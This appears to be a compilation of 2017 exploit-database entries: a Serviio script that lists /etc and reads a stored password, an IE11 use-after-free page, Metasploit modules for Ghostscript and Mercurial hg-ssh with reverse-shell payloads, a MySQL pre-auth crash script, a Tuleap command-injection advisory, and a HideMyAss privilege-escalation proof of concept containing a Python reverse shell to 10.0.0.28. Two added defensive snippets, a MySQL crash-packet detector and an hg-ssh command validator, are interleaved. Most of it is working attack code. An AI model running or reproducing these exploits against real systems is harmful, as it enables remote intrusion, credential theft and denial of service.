print '[*] Example: serviio_id.py 10.211.55.3 23423'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
print '\nPrinting ServiioLinks:'
print '----------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('serviioLink'):
print URLs.text
print
headers = {'Accept': 'application/xml'}
#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
print '\nPrinting directories:'
print '---------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('path'):
print URLs.text
print
headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
print '\nPrinting mediabrowser password:'
print '-------------------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('remoteUserPassword'):
print URLs.text
print
'''
rewt@zslab:~# python serviio_id.py 10.211.55.3 23423
Printing ServiioLinks:
----------------------
serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource
Printing directories:
---------------------
/etc/apache2
/etc/asl
/etc/cups
/etc/defaults
/etc/emond.d
/etc/mach_init.d
/etc/mach_init_per_login_session.d
/etc/mach_init_per_user.d
/etc/manpaths.d
/etc/newsyslog.d
/etc/openldap
/etc/pam.d
/etc/paths.d
/etc/periodic
/etc/pf.anchors
/etc/postfix
/etc/ppp
/etc/racoon
/etc/security
/etc/snmp
/etc/ssh
/etc/ssl
/etc/sudoers.d
Printing mediabrowser password:
-------------------------------
s3cr3to
rewt@zslab:~#
'''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:black;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/********************************
* Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
* Google Dork: n/a
* Date: 03.05.2017
* Exploit Author: Marcin Ressel
* TT: @r_esselm
* Vendor Homepage: www.microsoft.com
* Software Link: n/a
* Version: 11.0.9600.18638
* Tested on: Windows 7
* CVE : n/a
* ****************************
(151c.10a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
706af750 ff36 push dword ptr [esi] ds:002b:1195cfa0=????????
0:007> !heap -p -a @esi
address 1195cfa0 found in
_DPH_HEAP_ROOT @ 9f61000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
ef4230c: 1195c000 2000
743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
76f4a863 ntdll!RtlpFreeHeap+0x0000005d
76ef2bd5 ntdll!RtlFreeHeap+0x00000142
769c14ad kernel32!HeapFree+0x00000014
707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
700c5484 MSHTML!CFrameSite::Passivate+0x00000024
6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
705517cb MSHTML!CBase::JSBind_Release+0x00000050
6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
*
*/
var ref = [];
var doc = null;
var dom = null;
var trg = null;
var trg_parent = null;
var text_r = null;
var select_o = null;
function handle() {
try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
try{text_r.select();}catch(e){}
try{tree_r.setEnd(ref[0],0);}catch(e){}
try{select_o.selectAllChildren(doc.body);}catch(e){}
try{tree_r.surroundContents(ref[0]);}catch(e){}
try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
try{tree_r.selectNodeContents(document.body);}catch(e){}
try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
}
function testcase() {
var e1f = document.getElementById("e1");
doc = document.getElementById("t1").contentWindow.document;
e = e1f.contentWindow.document.createElement("ins");
e.cite = 'about:blank';
rf = doc.body.appendChild(e);
ref.push(rf);
e = e1f.contentWindow.document.createElement("iframe");
rf = doc.body.appendChild(e);
ref.push(rf);
dom = doc.getElementsByTagName("*");
trg = dom[3];
trg_parent = doc.body;
text_r = doc.body.createTextRange();
tree_r = doc.createRange();
tree_r.setStart(trg,0);
tree_r.setEnd(trg,0);
select_o = window.getSelection();
var ob = new MutationObserver(handle);
ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true });
try {
trg.insertBefore(document.createElement("div"),ref[1]);
} catch(e) {}
doc.adoptNode(trg.attributes[0]);
trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "À";
tmp = trg;
}
</script>
<title>IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
</head>
<body onload='testcase();'>
<iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
</body>
</html>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution',
'Description' => %q{
This module exploits a type confusion vulnerability in Ghostscript that can
be exploited to obtain arbitrary command execution. This vulnerability affects
Ghostscript version 9.21 and earlier and can be exploited through libraries
such as ImageMagick and Pillow.
},
'Author' => [
'Atlassian Security Team', # Vulnerability discovery
'hdm' # Metasploit module
],
'References' => [
%w{CVE 2017-8291},
%w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
%w{URL http://seclists.org/oss-sec/2017/q2/148},
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
],
'DisclosureDate' => 'Apr 27 2017',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'BadChars' => "\x22\x27\x5c)(", # ", ', \, (, and )
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic netcat bash-tcp'
}
},
'Targets' => [
['EPS file', template: 'msf.eps']
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat',
'LHOST' => Rex::Socket.source_address,
'DisablePayloadHandler' => false,
'WfsDelay' => 9001
}
))
register_options([
OptString.new('FILENAME', [true, 'Output file', 'msf.eps'])
])
end
# Example usage from the bug tracker:
# $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps
def exploit
file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded))
end
def template
::File.read(File.join(
Msf::Config.data_directory, 'exploits', 'CVE-2017-8291',
target[:template]
))
end
end
'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''
import socket
import sys
from struct import pack
'''
CVE-2017-3599 Proof of Concept exploit code.
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
Rodrigo Marcos
'''
if len(sys.argv)<2:
    print "Usage: python " + sys.argv[0] + " host [port]"
    exit(0)
else:
    HOST = sys.argv[1]
    if len(sys.argv)>2:
        PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
    else:
        PORT = 3306
print "[+] Creating packet..."
'''
3 bytes Packet length
1 byte Packet number
Login request:
Packet format (when the server is 4.1 or newer):
Bytes Content
----- ----
4 client capabilities
4 max packet size
1 charset number
23 reserved (always 0)
n user name, \0-terminated
n plugin auth data (e.g. scramble), length encoded
n database name, \0-terminated
(if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n client auth plugin name - \0-terminated string,
(if CLIENT_PLUGIN_AUTH is set in the capabilities)
'''
# packet_len = '\x64\x00\x00'
packet_num = '\x01'
#Login request packet
packet_cap = '\x85\xa2\xbf\x01' # client capabilities (default)
packet_max = '\x00\x00\x00\x01' # max packet size (default)
packet_cset = '\x21' # charset (default)
p_reserved = '\x00' * 23 # 23 bytes reserved with nulls (default)
packet_usr = 'test\x00' # username null terminated (default)
packet_auth = '\xff' # both \xff and \xfe crash the server
'''
Conditions to crash:
1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars
The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''
packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('i',len(packet))[:3]
request = packet_len + packet_num + packet
print "[+] Connecting to host..."
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    print "[+] Connected."
except:
    print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
    s.close()
    print "[+] Exiting."
    exit(0)
print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."
print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request
s.close()
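The crash conditions in the PoC describe a single signature: an auth-data field that begins with 0xff or 0xfe but carries fewer than 8 bytes. As an added defensive example (not part of the PoC above), this Python 3 parser splits a client login request into the fields documented in the PoC and flags packets that match that signature, for use in a network sensor or as a regression test against a patched server. `build_login_request` is a constructed helper that produces sample packets with the PoC's default capability, max-packet and charset values.

```python
import struct

# Fixed-size fields of the login request as documented in the PoC:
# 4 capabilities + 4 max packet size + 1 charset + 23 reserved.
FIXED_FIELDS_LEN = 4 + 4 + 1 + 23


def parse_login_request(raw):
    """Split a raw client login packet (3-byte length, 1-byte sequence
    number, then the HandshakeResponse body) into its fields.

    Raises ValueError when the packet is truncated or malformed in a way
    unrelated to CVE-2017-3599, so callers can tell the two cases apart.
    """
    if len(raw) < 4:
        raise ValueError("packet shorter than its 4-byte header")
    length = int.from_bytes(raw[0:3], "little")
    seq = raw[3]
    body = raw[4:4 + length]
    if len(body) != length:
        raise ValueError("declared length %d but %d body bytes present" % (length, len(body)))
    if len(body) < FIXED_FIELDS_LEN + 1:
        raise ValueError("body too short for the fixed fields and a username")
    caps, max_packet, charset = struct.unpack_from("<IIB", body, 0)
    nul = body.find(b"\x00", FIXED_FIELDS_LEN)
    if nul < 0:
        raise ValueError("username is not NUL-terminated")
    return {
        "seq": seq,
        "capabilities": caps,
        "max_packet": max_packet,
        "charset": charset,
        "user": body[FIXED_FIELDS_LEN:nul],
        # Everything after the username: auth data, then optional db/plugin name.
        # A legitimate packet (1-byte length + 20-byte scramble at minimum) is
        # therefore always well past the 8-byte threshold below.
        "auth": body[nul + 1:],
    }


def is_cve_2017_3599_trigger(raw):
    """True when the auth-data field matches the crash conditions stated in the
    PoC: it starts with 0xff or 0xfe and fewer than 8 bytes follow the username."""
    try:
        fields = parse_login_request(raw)
    except ValueError:
        return False  # malformed for other reasons; not this bug's signature
    auth = fields["auth"]
    return 0 < len(auth) < 8 and auth[0] in (0xfe, 0xff)


def build_login_request(user, auth, seq=1):
    """Constructed sample packet in the layout the PoC uses (same default
    capabilities, max packet size and charset); for tests and fixtures only."""
    body = (b"\x85\xa2\xbf\x01" + b"\x00\x00\x00\x01" + b"\x21" + b"\x00" * 23
            + user + b"\x00" + auth)
    return len(body).to_bytes(3, "little") + bytes([seq]) + body


if __name__ == "__main__":
    benign = build_login_request(b"test", b"\x14" + b"A" * 20)  # 1-byte length, 20-byte scramble
    crasher = build_login_request(b"test", b"\xff")              # the PoC's auth field
    print("benign flagged:", is_cve_2017_3599_trigger(benign))       # False
    print("PoC packet flagged:", is_cve_2017_3599_trigger(crasher))  # True
```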
# Tuleap - Command Injection in Project Wiki
**CVE:** CVE-2017-7981
**CVSSv3:** 9.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:U/RC:C)
**Versions affected:** >= 8.3 and <= 9.6.99.86
## Introduction
Tuleap is a Libre suite to plan, track, code and collaborate on software
projects. Tuleap helps development teams to build awesome applications,
better, faster, easier.
## Background
Tuleap uses PHPWiki as a plugin to provide a wiki feature for
projects. The version of PHPWiki used is 1.3.10. This version contains a
command injection vulnerability in the SyntaxHighlighter plugin. Other
applications that use PHPWiki similar to Tuleap will also be affected
by this issue.
The latest version of PHPWiki is 1.5.5 and is no longer vulnerable to this issue.
## Vulnerability
Authenticated users, including unprivileged users, with access to a
project containing a wiki, can exploit this command injection
(CI) vulnerability to gain remote unauthorised access to the server
hosting the Tuleap web application.
RCE is achieved by entering a SyntaxHighlighter plugin directive in a
new wiki page on any wiki available in any project. The SyntaxHighlighter
plugin in vulnerable versions of PHPWiki passes the `syntax` argument
to the `proc_open()` PHP builtin function which spawns a process in the
operating system running the web application.
The following is an example plugin directive which would cause the `id(1)`
command to be executed on a Linux server running an affected version
of Tuleap.
```
<?plugin SyntaxHighlighter syntax="c;id"
code to be highlighted
?>
```
The result of the command execution can be seen in the image below.
## Versions Affected
This vulnerability has existed in the version of PHPWiki used by the
Tuleap project since at least version 8.3 through to 9.6.99.86.
## References
https://github.com/xdrr/vulnerability-research/blob/master/webapp/tuleap/2017.04.tuleap-auth-ci.md
https://tuleap.net/plugins/tracker/?aid=10159
## Credit
This vulnerability was discovered by Ben N (pajexali@gmail.com) 19
April 2017.
Source: https://www.securify.nl/advisory/SFY20170408/local_privilege_escalation_vulnerability_in_hidemyass_pro_vpn_client_v3_x_for_macos.html
Abstract
A local privilege escalation vulnerability has been found in the helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS. The helper is installed setuid root and uses the openvpn binary to create VPN profiles and connections. The helper fails to perform signature checks on the openvpn file, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
Tested versions:
This issue was tested on HideMyAss Pro VPN v3.3.0.3 for macOS.
Fix:
There is currently no fix available.
Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to set up the VPN connections, including a client for macOS. It was discovered that version 3.x of HMA Pro VPN for macOS is affected by local privilege escalation.
Details:
The helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS is installed in PrivilegedHelperTools and run every time the user reboots. The privileged helper is responsible for opening VPN connections with correct security and connection profile settings.
The com.privax.hmaprovpn.helper is installed setuid root and fails to perform signature checks on the openvpn executable, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
Proof of Concept:
1) Create a Python script named openvpn and make sure it is executable (chmod u+x).
#!/usr/bin/python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.28",8099));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
2) Replace the openvpn binary located in the path below with this Python script.
/Applications/HMA\!\ Pro\ VPN.app/Contents/XPCServices/HMA\!\ Pro\ VPN\ Engine.xpc/Contents/MacOS/
3) Wait until the victim opens a VPN connection.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
'Description' => %q{
This module takes advantage of custom hg-ssh wrapper implementations that don't
adequately validate parameters passed to the hg binary, allowing users to trigger a
Python Debugger session, which allows arbitrary Python code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'claudijd',
],
'References' =>
[
['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
],
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'Privileged' => false,
'DisclosureDate' => "Apr 18 2017",
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(22),
OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
OptPath.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
]
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def username
datastore['USERNAME']
end
def ssh_priv_key
File.read(datastore['SSH_PRIV_KEY_FILE'])
end
def exploit
factory = ssh_socket_factory
ssh_options = {
auth_methods: ['publickey'],
config: false,
use_agent: false,
key_data: [ ssh_priv_key ],
port: rport,
proxy: factory,
non_interactive: true
}
ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
print_status("#{rhost}:#{rport} - Attempting to login...")
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
print_good("SSH connection is established.")
ssh.open_channel do |ch|
ch.exec "hg -R --debugger serve --stdio" do |ch, success|
ch.on_extended_data do |ch, type, data|
if data.match(/entering debugger/)
print_good("Triggered Debugger (#{data})")
ch.send_data "#{payload.encoded}\n"
else
print_bad("Unable to trigger debugger (#{data})")
end
end
end
end
begin
ssh.loop unless session_created?
rescue Errno::EBADF => e
elog(e.message)
end
end
end
end
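The module above relies on hg-ssh wrappers that forward whatever follows `-R` to the hg binary, so `--debugger` lands in the repository-path position. As an added example (not Mercurial's own hg-ssh and not part of the module), the following Python validator shows what adequate validation looks like for a forced-command wrapper: it accepts exactly `hg -R <repo> serve --stdio`, refuses any flag-shaped or extra token, and canonicalises the path against an allow list. `allowed_repos` and the `/srv/hg` paths are assumed deployment values.

```python
import os
import shlex
import sys


def validate_hg_ssh_command(original_command, allowed_repos):
    """Return the exact argv a wrapper may exec, or None to reject the request.

    Only `hg -R <repo> serve --stdio` is accepted, and <repo> must canonicalise
    to an entry of allowed_repos. Extra tokens, an option in the repo position
    (e.g. the module's `hg -R --debugger serve --stdio`), traversal outside the
    allow list and unparseable quoting are all refused.
    """
    try:
        argv = shlex.split(original_command or "")
    except ValueError:          # unbalanced quotes in SSH_ORIGINAL_COMMAND
        return None
    if len(argv) != 5:
        return None             # no room for any additional option
    if argv[0] != "hg" or argv[1] != "-R" or argv[3:] != ["serve", "--stdio"]:
        return None
    repo = argv[2]
    if repo.startswith("-"):
        return None             # --debugger, --config, ... must never reach hg as a path
    canonical = os.path.realpath(repo)
    allowed = {os.path.realpath(p) for p in allowed_repos}
    if canonical not in allowed:
        return None
    # Rebuild argv from validated parts rather than echoing the client's tokens.
    return ["hg", "-R", canonical, "serve", "--stdio"]


def main(allowed_repos):
    """Entry point for use as an authorized_keys forced command (assumed deployment)."""
    argv = validate_hg_ssh_command(os.environ.get("SSH_ORIGINAL_COMMAND"), allowed_repos)
    if argv is None:
        sys.stderr.write("Illegal command\n")
        return 255
    os.execvp(argv[0], argv)    # replaces this process; never returns on success


if __name__ == "__main__":
    sys.exit(main(["/srv/hg/proj"]))
```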